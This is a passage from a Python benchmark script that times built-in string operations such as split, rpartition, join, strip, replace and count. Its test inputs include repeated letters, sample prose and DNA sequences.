s1 = STR("A" * 1000)
s2 = STR("A")
s1_rpartition = s1.rpartition
for x in _RANGE_1000:
s1_rpartition(s2)
@bench('("A"*1000).rpartition("B")', "no match, single character", 1000)
def rpartition_test_no_match_single_character(STR):
s1 = STR("A" * 1000)
s2 = STR("B")
s1_rpartition = s1.rpartition
for x in _RANGE_1000:
s1_rpartition(s2)
@bench('("AB"*1000).rpartition("AB")', "early match, two characters", 1000)
def rpartition_test_quick_match_two_characters(STR):
s1 = STR("AB" * 1000)
s2 = STR("AB")
s1_rpartition = s1.rpartition
for x in _RANGE_1000:
s1_rpartition(s2)
@bench('("AB"*1000).rpartition("BC")', "no match, two characters", 1000)
def rpartition_test_no_match_two_character(STR):
s1 = STR("AB" * 1000)
s2 = STR("BC")
s1_rpartition = s1.rpartition
for x in _RANGE_1000:
s1_rpartition(s2)
@bench('("C"+"AB"*300).rpartition("CA")', "late match, two characters", 1000)
def rpartition_test_slow_match_two_characters(STR):
s1 = STR("C" + "AB" * 300)
s2 = STR("CA")
s1_rpartition = s1.rpartition
for x in _RANGE_1000:
s1_rpartition(s2)
@bench('s="ABC"*33; ("E"+s+("D"+s)*500).rpartition("E"+s)',
"late match, 100 characters", 100)
def rpartition_test_slow_match_100_characters(STR):
m = STR("ABC"*33)
d = STR("D")
e = STR("E")
s1 = e + m + (d+m)*500
s2 = e + m
s1_rpartition = s1.rpartition
for x in _RANGE_100:
s1_rpartition(s2)
#### Same for split(s, 1)
@bench('("A"*1000).split("A", 1)', "early match, single character", 1000)
def split_test_quick_match_single_character(STR):
s1 = STR("A" * 1000)
s2 = STR("A")
s1_split = s1.split
for x in _RANGE_1000:
s1_split(s2, 1)
@bench('("A"*1000).split("B", 1)', "no match, single character", 1000)
def split_test_no_match_single_character(STR):
s1 = STR("A" * 1000)
s2 = STR("B")
s1_split = s1.split
for x in _RANGE_1000:
s1_split(s2, 1)
@bench('("AB"*1000).split("AB", 1)', "early match, two characters", 1000)
def split_test_quick_match_two_characters(STR):
s1 = STR("AB" * 1000)
s2 = STR("AB")
s1_split = s1.split
for x in _RANGE_1000:
s1_split(s2, 1)
@bench('("AB"*1000).split("BC", 1)', "no match, two characters", 1000)
def split_test_no_match_two_character(STR):
s1 = STR("AB" * 1000)
s2 = STR("BC")
s1_split = s1.split
for x in _RANGE_1000:
s1_split(s2, 1)
@bench('("AB"*300+"C").split("BC", 1)', "late match, two characters", 1000)
def split_test_slow_match_two_characters(STR):
s1 = STR("AB" * 300+"C")
s2 = STR("BC")
s1_split = s1.split
for x in _RANGE_1000:
s1_split(s2, 1)
@bench('s="ABC"*33; ((s+"D")*500+s+"E").split(s+"E", 1)',
"late match, 100 characters", 100)
def split_test_slow_match_100_characters(STR):
m = STR("ABC"*33)
d = STR("D")
e = STR("E")
s1 = (m+d)*500 + m+e
s2 = m+e
s1_split = s1.split
for x in _RANGE_100:
s1_split(s2, 1)
#### Same for rsplit(s, 1)
@bench('("A"*1000).rsplit("A", 1)', "early match, single character", 1000)
def rsplit_test_quick_match_single_character(STR):
s1 = STR("A" * 1000)
s2 = STR("A")
s1_rsplit = s1.rsplit
for x in _RANGE_1000:
s1_rsplit(s2, 1)
@bench('("A"*1000).rsplit("B", 1)', "no match, single character", 1000)
def rsplit_test_no_match_single_character(STR):
s1 = STR("A" * 1000)
s2 = STR("B")
s1_rsplit = s1.rsplit
for x in _RANGE_1000:
s1_rsplit(s2, 1)
@bench('("AB"*1000).rsplit("AB", 1)', "early match, two characters", 1000)
def rsplit_test_quick_match_two_characters(STR):
s1 = STR("AB" * 1000)
s2 = STR("AB")
s1_rsplit = s1.rsplit
for x in _RANGE_1000:
s1_rsplit(s2, 1)
@bench('("AB"*1000).rsplit("BC", 1)', "no match, two characters", 1000)
def rsplit_test_no_match_two_character(STR):
s1 = STR("AB" * 1000)
s2 = STR("BC")
s1_rsplit = s1.rsplit
for x in _RANGE_1000:
s1_rsplit(s2, 1)
@bench('("C"+"AB"*300).rsplit("CA", 1)', "late match, two characters", 1000)
def rsplit_test_slow_match_two_characters(STR):
s1 = STR("C" + "AB" * 300)
s2 = STR("CA")
s1_rsplit = s1.rsplit
for x in _RANGE_1000:
s1_rsplit(s2, 1)
@bench('s="ABC"*33; ("E"+s+("D"+s)*500).rsplit("E"+s, 1)',
"late match, 100 characters", 100)
def rsplit_test_slow_match_100_characters(STR):
m = STR("ABC"*33)
d = STR("D")
e = STR("E")
s1 = e + m + (d+m)*500
s2 = e + m
s1_rsplit = s1.rsplit
for x in _RANGE_100:
s1_rsplit(s2, 1)
#### Benchmark the operator-based methods
@bench('"A"*10', "repeat 1 character 10 times", 1000)
def repeat_single_10_times(STR):
s = STR("A")
for x in _RANGE_1000:
s * 10
@bench('"A"*1000', "repeat 1 character 1000 times", 1000)
def repeat_single_1000_times(STR):
s = STR("A")
for x in _RANGE_1000:
s * 1000
@bench('"ABCDE"*10', "repeat 5 characters 10 times", 1000)
def repeat_5_10_times(STR):
s = STR("ABCDE")
for x in _RANGE_1000:
s * 10
@bench('"ABCDE"*1000', "repeat 5 characters 1000 times", 1000)
def repeat_5_1000_times(STR):
s = STR("ABCDE")
for x in _RANGE_1000:
s * 1000
# + for concat
@bench('"Andrew"+"Dalke"', "concat two strings", 1000)
def concat_two_strings(STR):
s1 = STR("Andrew")
s2 = STR("Dalke")
for x in _RANGE_1000:
s1+s2
@bench('s1+s2+s3+s4+...+s20', "concat 20 strings of words length 4 to 15",
1000)
def concat_many_strings(STR):
s1=STR('TIXSGYNREDCVBHJ')
s2=STR('PUMTLXBZVDO')
s3=STR('FVZNJ')
s4=STR('OGDXUW')
s5=STR('WEIMRNCOYVGHKB')
s6=STR('FCQTNMXPUZH')
s7=STR('TICZJYRLBNVUEAK')
s8=STR('REYB')
s9=STR('PWUOQ')
s10=STR('EQHCMKBS')
s11=STR('AEVDFOH')
s12=STR('IFHVD')
s13=STR('JGTCNLXWOHQ')
s14=STR('ITSKEPYLROZAWXF')
s15=STR('THEK')
s16=STR('GHPZFBUYCKMNJIT')
s17=STR('JMUZ')
s18=STR('WLZQMTB')
s19=STR('KPADCBW')
s20=STR('TNJHZQAGBU')
for x in _RANGE_1000:
(s1 + s2+ s3+ s4+ s5+ s6+ s7+ s8+ s9+s10+
s11+s12+s13+s14+s15+s16+s17+s18+s19+s20)
#### Benchmark join
def get_bytes_yielding_seq(STR, arg):
if STR is BYTES and sys.version_info >= (3,):
raise UnsupportedType
return STR(arg)
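# In Python 3, iterating a bytes object yields integers rather than length-1
# byte strings, so bytes cannot serve as the argument sequence for join();
# hence the UnsupportedType guard above.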
@bench('"A".join("")',
"join empty string, with 1 character sep", 100)
def join_empty_single(STR):
sep = STR("A")
s2 = get_bytes_yielding_seq(STR, "")
sep_join = sep.join
for x in _RANGE_100:
sep_join(s2)
@bench('"ABCDE".join("")',
"join empty string, with 5 character sep", 100)
def join_empty_5(STR):
sep = STR("ABCDE")
s2 = get_bytes_yielding_seq(STR, "")
sep_join = sep.join
for x in _RANGE_100:
sep_join(s2)
@bench('"A".join("ABC..Z")',
"join string with 26 characters, with 1 character sep", 1000)
def join_alphabet_single(STR):
sep = STR("A")
s2 = get_bytes_yielding_seq(STR, "ABCDEFGHIJKLMnOPQRSTUVWXYZ")
sep_join = sep.join
for x in _RANGE_1000:
sep_join(s2)
@bench('"ABCDE".join("ABC..Z")',
"join string with 26 characters, with 5 character sep", 1000)
def join_alphabet_5(STR):
sep = STR("ABCDE")
s2 = get_bytes_yielding_seq(STR, "ABCDEFGHIJKLMnOPQRSTUVWXYZ")
sep_join = sep.join
for x in _RANGE_1000:
sep_join(s2)
@bench('"A".join(list("ABC..Z"))',
"join list of 26 characters, with 1 character sep", 1000)
def join_alphabet_list_single(STR):
sep = STR("A")
s2 = [STR(x) for x in "ABCDEFGHIJKLMnOPQRSTUVWXYZ"]
sep_join = sep.join
for x in _RANGE_1000:
sep_join(s2)
@bench('"ABCDE".join(list("ABC..Z"))',
"join list of 26 characters, with 5 character sep", 1000)
def join_alphabet_list_five(STR):
sep = STR("ABCDE")
s2 = [STR(x) for x in "ABCDEFGHIJKLMnOPQRSTUVWXYZ"]
sep_join = sep.join
for x in _RANGE_1000:
sep_join(s2)
@bench('"A".join(["Bob"]*100))',
"join list of 100 words, with 1 character sep", 1000)
def join_100_words_single(STR):
sep = STR("A")
s2 = [STR("Bob")]*100
sep_join = sep.join
for x in _RANGE_1000:
sep_join(s2)
@bench('"ABCDE".join(["Bob"]*100))',
"join list of 100 words, with 5 character sep", 1000)
def join_100_words_5(STR):
sep = STR("ABCDE")
s2 = [STR("Bob")]*100
sep_join = sep.join
for x in _RANGE_1000:
sep_join(s2)
#### split tests
@bench('("Here are some words. "*2).split()', "split whitespace (small)", 1000)
def whitespace_split(STR):
s = STR("Here are some words. "*2)
s_split = s.split
for x in _RANGE_1000:
s_split()
@bench('("Here are some words. "*2).rsplit()', "split whitespace (small)", 1000)
def whitespace_rsplit(STR):
s = STR("Here are some words. "*2)
s_rsplit = s.rsplit
for x in _RANGE_1000:
s_rsplit()
@bench('("Here are some words. "*2).split(None, 1)',
"split 1 whitespace", 1000)
def whitespace_split_1(STR):
s = STR("Here are some words. "*2)
s_split = s.split
N = None
for x in _RANGE_1000:
s_split(N, 1)
@bench('("Here are some words. "*2).rsplit(None, 1)',
"split 1 whitespace", 1000)
def whitespace_rsplit_1(STR):
s = STR("Here are some words. "*2)
s_rsplit = s.rsplit
N = None
for x in _RANGE_1000:
s_rsplit(N, 1)
@bench('("Here are some words. "*2).partition(" ")',
"split 1 whitespace", 1000)
def whitespace_partition(STR):
sep = STR(" ")
s = STR("Here are some words. "*2)
s_partition = s.partition
for x in _RANGE_1000:
s_partition(sep)
@bench('("Here are some words. "*2).rpartition(" ")',
"split 1 whitespace", 1000)
def whitespace_rpartition(STR):
sep = STR(" ")
s = STR("Here are some words. "*2)
s_rpartition = s.rpartition
for x in _RANGE_1000:
s_rpartition(sep)
human_text = """\
Python is a dynamic object-oriented programming language that can be
used for many kinds of software development. It offers strong support
for integration with other languages and tools, comes with extensive
standard libraries, and can be learned in a few days. Many Python
programmers report substantial productivity gains and feel the language
encourages the development of higher quality, more maintainable code.
Python runs on Windows, Linux/Unix, Mac OS X, Amiga, Palm
Handhelds, and Nokia mobile phones. Python has also been ported to the
Java and .NET virtual machines.
Python is distributed under an OSI-approved open source license that
makes it free to use, even for commercial products.
"""*25
human_text_bytes = bytes_from_str(human_text)
human_text_unicode = unicode_from_str(human_text)
def _get_human_text(STR):
if STR is UNICODE:
return human_text_unicode
if STR is BYTES:
return human_text_bytes
raise AssertionError
@bench('human_text.split()', "split whitespace (huge)", 10)
def whitespace_split_huge(STR):
s = _get_human_text(STR)
s_split = s.split
for x in _RANGE_10:
s_split()
@bench('human_text.rsplit()', "split whitespace (huge)", 10)
def whitespace_rsplit_huge(STR):
s = _get_human_text(STR)
s_rsplit = s.rsplit
for x in _RANGE_10:
s_rsplit()
@bench('"this\\nis\\na\\ntest\\n".split("\\n")', "split newlines", 1000)
def newlines_split(STR):
s = STR("this\nis\na\ntest\n")
s_split = s.split
nl = STR("\n")
for x in _RANGE_1000:
s_split(nl)
@bench('"this\\nis\\na\\ntest\\n".rsplit("\\n")', "split newlines", 1000)
def newlines_rsplit(STR):
s = STR("this\nis\na\ntest\n")
s_rsplit = s.rsplit
nl = STR("\n")
for x in _RANGE_1000:
s_rsplit(nl)
@bench('"this\\nis\\na\\ntest\\n".splitlines()', "split newlines", 1000)
def newlines_splitlines(STR):
s = STR("this\nis\na\ntest\n")
s_splitlines = s.splitlines
for x in _RANGE_1000:
s_splitlines()
## split text with 2000 newlines
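# _make_2000_lines builds a deterministic (seeded) text of roughly 2000
# newline-terminated lines of printable ASCII with random lengths, used by the
# "split 2000 newlines" benchmarks below.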
def _make_2000_lines():
import random
r = random.Random(100)
chars = list(map(chr, range(32, 128)))
i = 0
while i < len(chars):
chars[i] = " "
i += r.randrange(9)
s = "".join(chars)
s = s*4
words = []
for i in range(2000):
start = r.randrange(96)
n = r.randint(5, 65)
words.append(s[start:start+n])
return "\n".join(words)+"\n"
_text_with_2000_lines = _make_2000_lines()
_text_with_2000_lines_bytes = bytes_from_str(_text_with_2000_lines)
_text_with_2000_lines_unicode = unicode_from_str(_text_with_2000_lines)
def _get_2000_lines(STR):
if STR is UNICODE:
return _text_with_2000_lines_unicode
if STR is BYTES:
return _text_with_2000_lines_bytes
raise AssertionError
@bench('"...text...".split("\\n")', "split 2000 newlines", 10)
def newlines_split_2000(STR):
s = _get_2000_lines(STR)
s_split = s.split
nl = STR("\n")
for x in _RANGE_10:
s_split(nl)
@bench('"...text...".rsplit("\\n")', "split 2000 newlines", 10)
def newlines_rsplit_2000(STR):
s = _get_2000_lines(STR)
s_rsplit = s.rsplit
nl = STR("\n")
for x in _RANGE_10:
s_rsplit(nl)
@bench('"...text...".splitlines()', "split 2000 newlines", 10)
def newlines_splitlines_2000(STR):
s = _get_2000_lines(STR)
s_splitlines = s.splitlines
for x in _RANGE_10:
s_splitlines()
## split text on "--" characters
@bench(
'"this--is--a--test--of--the--emergency--broadcast--system".split("--")',
"split on multicharacter separator (small)", 1000)
def split_multichar_sep_small(STR):
s = STR("this--is--a--test--of--the--emergency--broadcast--system")
s_split = s.split
pat = STR("--")
for x in _RANGE_1000:
s_split(pat)
@bench(
'"this--is--a--test--of--the--emergency--broadcast--system".rsplit("--")',
"split on multicharacter separator (small)", 1000)
def rsplit_multichar_sep_small(STR):
s = STR("this--is--a--test--of--the--emergency--broadcast--system")
s_rsplit = s.rsplit
pat = STR("--")
for x in _RANGE_1000:
s_rsplit(pat)
## split dna text on "ACTAT" characters
@bench('dna.split("ACTAT")',
"split on multicharacter separator (dna)", 10)
def split_multichar_sep_dna(STR):
s = _get_dna(STR)
s_split = s.split
pat = STR("ACTAT")
for x in _RANGE_10:
s_split(pat)
@bench('dna.rsplit("ACTAT")',
"split on multicharacter separator (dna)", 10)
def rsplit_multichar_sep_dna(STR):
s = _get_dna(STR)
s_rsplit = s.rsplit
pat = STR("ACTAT")
for x in _RANGE_10:
s_rsplit(pat)
## split with limits
GFF3_example = "\t".join([
"I", "Genomic_canonical", "region", "357208", "396183", ".", "+", ".",
"ID=Sequence:R119;note=Clone R119%3B Genbank AF063007;Name=R119"])
@bench('GFF3_example.split("\\t")', "tab split", 1000)
def tab_split_no_limit(STR):
sep = STR("\t")
s = STR(GFF3_example)
s_split = s.split
for x in _RANGE_1000:
s_split(sep)
@bench('GFF3_example.split("\\t", 8)', "tab split", 1000)
def tab_split_limit(STR):
sep = STR("\t")
s = STR(GFF3_example)
s_split = s.split
for x in _RANGE_1000:
s_split(sep, 8)
@bench('GFF3_example.rsplit("\\t")', "tab split", 1000)
def tab_rsplit_no_limit(STR):
sep = STR("\t")
s = STR(GFF3_example)
s_rsplit = s.rsplit
for x in _RANGE_1000:
s_rsplit(sep)
@bench('GFF3_example.rsplit("\\t", 8)', "tab split", 1000)
def tab_rsplit_limit(STR):
sep = STR("\t")
s = STR(GFF3_example)
s_rsplit = s.rsplit
for x in _RANGE_1000:
s_rsplit(sep, 8)
#### Count characters
@bench('...text.with.2000.newlines.count("\\n")',
"count newlines", 10)
def count_newlines(STR):
s = _get_2000_lines(STR)
s_count = s.count
nl = STR("\n")
for x in _RANGE_10:
s_count(nl)
# Orchid sequences concatenated, from Biopython
_dna = """
CGTAACAAGGTTTCCGTAGGTGAACCTGCGGAAGGATCATTGTTGAGATCACATAATAATTGATCGGGTT
AATCTGGAGGATCTGTTTACTTTGGTCACCCATGAGCATTTGCTGTTGAAGTGACCTAGAATTGCCATCG
AGCCTCCTTGGGAGCTTTCTTGTTGGCGAGATCTAAACCCTTGCCCGGCGCAGTTTTGCTCCAAGTCGTT
TGACACATAATTGGTGAAGGGGGTGGCATCCTTCCCTGACCCTCCCCCAACTATTTTTTTAACAACTCTC
AGCAACGGAGACTCAGTCTTCGGCAAATGCGATAAATGGTGTGAATTGCAGAATCCCGTGCACCATCGAG
TCTTTGAACGCAAGTTGCGCCCGAGGCCATCAGGCCAAGGGCACGCCTGCCTGGGCATTGCGAGTCATAT
CTCTCCCTTAACGAGGCTGTCCATACATACTGTTCAGCCGGTGCGGATGTGAGTTTGGCCCCTTGTTCTT
TGGTACGGGGGGTCTAAGAGCTGCATGGGCTTTTGATGGTCCTAAATACGGCAAGAGGTGGACGAACTAT
GCTACAACAAAATTGTTGTGCAGAGGCCCCGGGTTGTCGTATTAGATGGGCCACCGTAATCTGAAGACCC
TTTTGAACCCCATTGGAGGCCCATCAACCCATGATCAGTTGATGGCCATTTGGTTGCGACCCCAGGTCAG
GTGAGCAACAGCTGTCGTAACAAGGTTTCCGTAGGGTGAACTGCGGAAGGATCATTGTTGAGATCACATA
ATAATTGATCGAGTTAATCTGGAGGATCTGTTTACTTGGGTCACCCATGGGCATTTGCTGTTGAAGTGAC
CTAGATTTGCCATCGAGCCTCCTTGGGAGCATCCTTGTTGGCGATATCTAAACCCTCAATTTTTCCCCCA
ATCAAATTACACAAAATTGGTGGAGGGGGTGGCATTCTTCCCTTACCCTCCCCCAAATATTTTTTTAACA
ACTCTCAGCAACGGATATCTCAGCTCTTGCATCGATGAAGAACCCACCGAAATGCGATAAATGGTGTGAA
TTGCAGAATCCCGTGAACCATCGAGTCTTTGAACGCAAGTTGCGCCCGAGGCCATCAGGCCAAGGGCACG
CCTGCCTGGGCATTGCGAGTCATATCTCTCCCTTAACGAGGCTGTCCATACATACTGTTCAGCCGGTGCG
GATGTGAGTTTGGCCCCTTGTTCTTTGGTACGGGGGGTCTAAGAGATGCATGGGCTTTTGATGGTCCTAA
ATACGGCAAGAGGTGGACGAACTATGCTACAACAAAATTGTTGTGCAAAGGCCCCGGGTTGTCGTATAAG
ATGGGCCACCGATATCTGAAGACCCTTTTGGACCCCATTGGAGCCCATCAACCCATGTCAGTTGATGGCC
ATTCGTAACAAGGTTTCCGTAGGTGAACCTGCGGAAGGATCATTGTTGAGATCACATAATAATTGATCGA
GTTAATCTGGAGGATCTGTTTACTTGGGTCACCCATGGGCATTTGCTGTTGAAGTGACCTAGATTTGCCA
TCGAGCCTCCTTGGGAGCTTTCTTGTTGGCGATATCTAAACCCTTGCCCGGCAGAGTTTTGGGAATCCCG
TGAACCATCGAGTCTTTGAACGCAAGTTGCGCCCGAGGCCATCAGGCCAAGGGCACGCCTGCCTGGGCAT
TGCGAGTCATATCTCTCCCTTAACGAGGCTGTCCATACACACCTGTTCAGCCGGTGCGGATGTGAGTTTG
GCCCCTTGTTCTTTGGTACGGGGGGTCTAAGAGCTGCATGGGCTTTTGATGGTCCTAAATACGGCAAGAG
GTGGACGAACTATGCTACAACAAAATTGTTGTGCAAAGGCCCCGGGTTGTCGTATTAGATGGGCCACCAT
AATCTGAAGACCCTTTTGAACCCCATTGGAGGCCCATCAACCCATGATCAGTTGATGGCCATTTGGTTGC
GACCCAGTCAGGTGAGGGTAGGTGAACCTGCGGAAGGATCATTGTTGAGATCACATAATAATTGATCGAG
TTAATCTGGAGGATCTGTTTACTTTGGTCACCCATGGGCATTTGCTGTTGAAGTGACCTAGATTTGCCAT
CGAGCCTCCTTGGGAGCTTTCTTGTTGGCGAGATCTAAACCCTTGCCCGGCGGAGTTTGGCGCCAAGTCA
TATGACACATAATTGGTGAAGGGGGTGGCATCCTGCCCTGACCCTCCCCAAATTATTTTTTTAACAACTC
TCAGCAACGGATATCTCGGCTCTTGCATCGATGAAGAACGCAGCGAAATGCGATAAATGGTGTGAATTGC
AGAATCCCGTGAACCATCGAGTCTTTGGAACGCAAGTTGCGCCCGAGGCCATCAGGCCAAGGGCACGCCT
GCCTGGGCATTGGGAATCATATCTCTCCCCTAACGAGGCTATCCAAACATACTGTTCATCCGGTGCGGAT
GTGAGTTTGGCCCCTTGTTCTTTGGTACCGGGGGTCTAAGAGCTGCATGGGCATTTGATGGTCCTCAAAA
CGGCAAGAGGTGGACGAACTATGCCACAACAAAATTGTTGTCCCAAGGCCCCGGGTTGTCGTATTAGATG
GGCCACCGTAACCTGAAGACCCTTTTGAACCCCATTGGAGGCCCATCAACCCATGATCAGTTGATGACCA
TTTGTTGCGACCCCAGTCAGCTGAGCAACCCGCTGAGTGGAAGGTCATTGCCGATATCACATAATAATTG
ATCGAGTTAATCTGGAGGATCTGTTTACTTGGTCACCCATGAGCATTTGCTGTTGAAGTGACCTAGATTT
GCCATCGAGCCTCCTTGGGAGTTTTCTTGTTGGCGAGATCTAAACCCTTGCCCGGCGGAGTTGTGCGCCA
AGTCATATGACACATAATTGGTGAAGGGGGTGGCATCCTGCCCTGACCCTCCCCAAATTATTTTTTTAAC
AACTCTCAGCAACGGATATCTCGGCTCTTGCATCGATGAAGAACGCAGCGAAATGCGATAAATGGTGTGA
ATTGCAGAATCCCGTGAACCATCGAGTCTTTGAACGCAAGTTGCGCCCGAGGCCATCAGGCCAAGGGCAC
GCCTGCCTGGGCATTGCGAGTCATATCTCTCCCTTAACGAGGCTGTCCATACATACTGTTCATCCGGTGC
GGATGTGAGTTTGGCCCCTTGTTCTTTGGTACGGGGGGTCTAAGAGCTGCATGGGCATTTGATGGTCCTC
AAAACGGCAAGAGGTGGACGAACTATGCTACAACCAAATTGTTGTCCCAAGGCCCCGGGTTGTCGTATTA
GATGGGCCACCGTAACCTGAAGACCCTTTTGAACCCCATTGGAGGCCCATCAACCCATGATCAGTTGATG
ACCATGTGTTGCGACCCCAGTCAGCTGAGCAACGCGCTGAGCGTAACAAGGTTTCCGTAGGTGGACCTCC
GGGAGGATCATTGTTGAGATCACATAATAATTGATCGAGGTAATCTGGAGGATCTGCATATTTTGGTCAC
"""
_dna = "".join(_dna.splitlines())
_dna = _dna * 25
_dna_bytes = bytes_from_str(_dna)
_dna_unicode = unicode_from_str(_dna)
def _get_dna(STR):
if STR is UNICODE:
return _dna_unicode
if STR is BYTES:
return _dna_bytes
raise AssertionError
@bench('dna.count("AACT")', "count AACT substrings in DNA example", 10)
def count_aact(STR):
seq = _get_dna(STR)
seq_count = seq.count
needle = STR("AACT")
for x in _RANGE_10:
seq_count(needle)
##### startswith and endswith
@bench('"Andrew".startswith("A")', 'startswith single character', 1000)
def startswith_single(STR):
s1 = STR("Andrew")
s2 = STR("A")
s1_startswith = s1.startswith
for x in _RANGE_1000:
s1_startswith(s2)
@bench('"Andrew".startswith("Andrew")', 'startswith multiple characters',
1000)
def startswith_multiple(STR):
s1 = STR("Andrew")
s2 = STR("Andrew")
s1_startswith = s1.startswith
for x in _RANGE_1000:
s1_startswith(s2)
@bench('"Andrew".startswith("Anders")',
'startswith multiple characters - not!', 1000)
def startswith_multiple_not(STR):
s1 = STR("Andrew")
s2 = STR("Anders")
s1_startswith = s1.startswith
for x in _RANGE_1000:
s1_startswith(s2)
# endswith
@bench('"Andrew".endswith("w")', 'endswith single character', 1000)
def endswith_single(STR):
s1 = STR("Andrew")
s2 = STR("w")
s1_endswith = s1.endswith
for x in _RANGE_1000:
s1_endswith(s2)
@bench('"Andrew".endswith("Andrew")', 'endswith multiple characters', 1000)
def endswith_multiple(STR):
s1 = STR("Andrew")
s2 = STR("Andrew")
s1_endswith = s1.endswith
for x in _RANGE_1000:
s1_endswith(s2)
@bench('"Andrew".endswith("Anders")',
'endswith multiple characters - not!', 1000)
def endswith_multiple_not(STR):
s1 = STR("Andrew")
s2 = STR("Anders")
s1_endswith = s1.endswith
for x in _RANGE_1000:
s1_endswith(s2)
#### Strip
@bench('"Hello!\\n".strip()', 'strip terminal newline', 1000)
def terminal_newline_strip_right(STR):
s = STR("Hello!\n")
s_strip = s.strip
for x in _RANGE_1000:
s_strip()
@bench('"Hello!\\n".rstrip()', 'strip terminal newline', 1000)
def terminal_newline_rstrip(STR):
s = STR("Hello!\n")
s_rstrip = s.rstrip
for x in _RANGE_1000:
s_rstrip()
@bench('"\\nHello!".strip()', 'strip terminal newline', 1000)
def terminal_newline_strip_left(STR):
s = STR("\nHello!")
s_strip = s.strip
for x in _RANGE_1000:
s_strip()
@bench('"\\nHello!\\n".strip()', 'strip terminal newline', 1000)
def terminal_newline_strip_both(STR):
s = STR("\nHello!\n")
s_strip = s.strip
for x in _RANGE_1000:
s_strip()
@bench('"\\nHello!".rstrip()', 'strip terminal newline', 1000)
def terminal_newline_lstrip(STR):
s = STR("\nHello!")
s_lstrip = s.lstrip
for x in _RANGE_1000:
s_lstrip()
@bench('s="Hello!\\n"; s[:-1] if s[-1]=="\\n" else s',
'strip terminal newline', 1000)
def terminal_newline_if_else(STR):
s = STR("Hello!\n")
NL = STR("\n")
for x in _RANGE_1000:
s[:-1] if (s[-1] == NL) else s
# Strip multiple spaces or tabs
@bench('"Hello\\t \\t".strip()', 'strip terminal spaces and tabs', 1000)
def terminal_space_strip(STR):
s = STR("Hello\t \t!")
s_strip = s.strip
for x in _RANGE_1000:
s_strip()
@bench('"Hello\\t \\t".rstrip()', 'strip terminal spaces and tabs', 1000)
def terminal_space_rstrip(STR):
s = STR("Hello!\t \t")
s_rstrip = s.rstrip
for x in _RANGE_1000:
s_rstrip()
@bench('"\\t \\tHello".rstrip()', 'strip terminal spaces and tabs', 1000)
def terminal_space_lstrip(STR):
s = STR("\t \tHello!")
s_lstrip = s.lstrip
for x in _RANGE_1000:
s_lstrip()
#### replace
@bench('"This is a test".replace(" ", "\\t")', 'replace single character',
1000)
def replace_single_character(STR):
s = STR("This is a test!")
from_str = STR(" ")
to_str = STR("\t")
s_replace = s.replace
for x in _RANGE_1000:
s_replace(from_str, to_str)
@uses_re
@bench('re.sub(" ", "\\t", "This is a test"', 'replace single character',
1000)
def replace_single_character_re(STR):
s = STR("This is a test!")
pat = re.compile(STR(" "))
to_str = STR("\t")
pat_sub = pat.sub
for x in _RANGE_1000:
pat_sub(to_str, s)
@bench('"...text.with.2000.lines...replace("\\n", " ")',
'replace single character, big string', 10)
def replace_single_character_big(STR):
s = _get_2000_lines(STR)
from_str = STR("\n")
to_str = STR(" ")
s_replace = s.replace
for x in _RANGE_10:
s_replace(from_str, to_str)
@uses_re
@bench('re.sub("\\n", " ", "...text.with.2000.lines...")',
'replace single character, big string', 10)
def replace_single_character_big_re(STR):
s = _get_2000_lines(STR)
pat = re.compile(STR("\n"))
to_str = STR(" ")
pat_sub = pat.sub
for x in _RANGE_10:
pat_sub(to_str, s)
@bench('dna.replace("ATC", "ATT")',
'replace multiple characters, dna', 10)
def replace_multiple_characters_dna(STR):
seq = _get_dna(STR)
from_str = STR("ATC")
to_str = STR("ATT")
seq_replace = seq.replace
for x in _RANGE_10:
seq_replace(from_str, to_str)
# This increases the character count
@bench('"...text.with.2000.newlines...replace("\\n", "\\r\\n")',
'replace and expand multiple characters, big string', 10)
def replace_multiple_character_big(STR):
s = _get_2000_lines(STR)
from_str = STR("\n")
to_str = STR("\r\n")
s_replace = s.replace
for x in _RANGE_10:
s_replace(from_str, to_str)
# This decreases the character count
@bench('"When shall we three meet again?".replace("ee", "")',
'replace/remove multiple characters', 1000)
def replace_multiple_character_remove(STR):
s = STR("When shall we three meet again?")
from_str = STR("ee")
to_str = STR("")
s_replace = s.replace
for x in _RANGE_1000:
s_replace(from_str, to_str)
big_s = "A" + ("Z"*128*1024)
big_s_bytes = bytes_from_str(big_s)
big_s_unicode = unicode_from_str(big_s)
def _get_big_s(STR):
if STR is UNICODE: return big_s_unicode
if STR is BYTES: return big_s_bytes
raise AssertionError
# The older replace implementation counted all matches in
# the string even when it only needed to make one replacement.
@bench('("A" + ("Z"*128*1024)).replace("A", "BB", 1)',
'quick replace single character match', 10)
def quick_replace_single_match(STR):
s = _get_big_s(STR)
from_str = STR("A")
to_str = STR("BB")
s_replace = s.replace
for x in _RANGE_10:
s_replace(from_str, to_str, 1)
@bench('("A" + ("Z"*128*1024)).replace("AZZ", "BBZZ", 1)',
'quick replace multiple character match', 10)
def quick_replace_multiple_match(STR):
s = _get_big_s(STR)
from_str = STR("AZZ")
to_str = STR("BBZZ")
s_replace = s.replace
for x in _RANGE_10:
s_replace(from_str, to_str, 1)
####
# CCP does a lot of this, for internationalisation of ingame messages.
_format = "The %(thing)s is %(place)s the %(location)s."
_format_dict = { "thing":"THING", "place":"PLACE", "location":"LOCATION", }
_format_bytes = bytes_from_str(_format)
_format_unicode = unicode_from_str(_format)
_format_dict_bytes = dict((bytes_from_str(k), bytes_from_str(v)) for (k,v) in _format_dict.items())
_format_dict_unicode = dict((unicode_from_str(k), unicode_from_str(v)) for (k,v) in _format_dict.items())
def _get_format(STR):
if STR is UNICODE:
return _format_unicode
if STR is BYTES:
if sys.version_info >= (3,):
raise UnsupportedType
return _format_bytes
raise AssertionError
def _get_format_dict(STR):
if STR is UNICODE:
return _format_dict_unicode
if STR is BYTES:
if sys.version_info >= (3,):
raise UnsupportedType
return _format_dict_bytes
raise AssertionError
# Formatting.
@bench('"The %(k1)s is %(k2)s the %(k3)s."%{"k1":"x","k2":"y","k3":"z",}',
'formatting a string type with a dict', 1000)
def format_with_dict(STR):
s = _get_format(STR)
d = _get_format_dict(STR)
for x in _RANGE_1000:
s % d
#### Upper- and lower- case conversion
@bench('("Where in the world is Carmen San Deigo?"*10).lower()',
"case conversion -- rare", 1000)
def lower_conversion_rare(STR):
s = STR("Where in the world is Carmen San Deigo?"*10)
s_lower = s.lower
for x in _RANGE_1000:
s_lower()
@bench('("WHERE IN THE WORLD IS CARMEN SAN DEIGO?"*10).lower()',
"case conversion -- dense", 1000)
def lower_conversion_dense(STR):
s = STR("WHERE IN THE WORLD IS CARMEN SAN DEIGO?"*10)
s_lower = s.lower
for x in _RANGE_1000:
s_lower()
@bench('("wHERE IN THE WORLD IS cARMEN sAN dEIGO?"*10).upper()',
"case conversion -- rare", 1000)
